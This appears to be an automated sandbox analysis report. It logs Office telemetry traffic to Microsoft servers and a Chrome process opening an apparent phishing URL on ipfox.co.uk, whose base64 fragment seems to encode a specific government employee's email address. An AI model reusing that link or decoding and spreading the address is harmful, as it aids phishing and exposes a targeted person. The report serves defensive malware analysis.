                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              144192.168.2.44989213.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:16 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:16 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:16 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1425
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                              ETag: "0x8DC582BE6BD89A1"
                                              x-ms-request-id: 36aee691-501e-0047-745d-26ce6c000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134616Z-16849878b7898p5f6vryaqvp5800000001a000000000ne16
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:16 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              145192.168.2.44989413.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:16 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:16 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:16 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1415
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                              ETag: "0x8DC582BE7C66E85"
                                              x-ms-request-id: 6afd71f5-301e-003f-7d9e-26266f000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134616Z-16849878b78nx5sne3fztmu6xc00000001g000000000gzx3
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              X-Cache-Info: L1_T2
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:16 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              146192.168.2.44989113.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:16 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:16 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:16 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1362
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                              ETag: "0x8DC582BDC13EFEF"
                                              x-ms-request-id: a9595a72-801e-0015-2bad-26f97f000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134616Z-16849878b78nx5sne3fztmu6xc00000001q0000000000q3f
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:16 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              147192.168.2.44989513.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:16 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:17 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:17 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1378
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                              ETag: "0x8DC582BDB813B3F"
                                              x-ms-request-id: 697bb720-201e-0071-0781-25ff15000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134617Z-16849878b785jrf8dn0d2rczaw00000001t000000000a83m
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:17 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              148192.168.2.44989713.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:17 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:17 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:17 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1368
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                              ETag: "0x8DC582BE51CE7B3"
                                              x-ms-request-id: 3d4cb055-601e-0097-01e5-21f33a000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134617Z-16849878b78fssff8btnns3b1400000000x0000000009sup
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:17 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              149192.168.2.44989613.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:17 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:17 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:17 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1405
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                              ETag: "0x8DC582BE89A8F82"
                                              x-ms-request-id: 622dd3a6-e01e-0003-140d-260fa8000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134617Z-16849878b78j5kdg3dndgqw0vg00000002bg000000007tr1
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:17 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                              Click to jump to process

                                              Click to jump to process

                                              Click to jump to process

                                              Target ID:0
                                              Start time:09:44:59
                                              Start date:25/10/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                              Imagebase:0x7ff76e190000
                                              File size:3'242'272 bytes
                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              Target ID:2
                                              Start time:09:45:03
                                              Start date:25/10/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1988,i,10506442713732775358,2264122065710547081,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                              Imagebase:0x7ff76e190000
                                              File size:3'242'272 bytes
                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              Target ID:3
                                              Start time:09:45:06
                                              Start date:25/10/2024
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVz"
                                              Imagebase:0x7ff76e190000
                                              File size:3'242'272 bytes
                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              No disassembly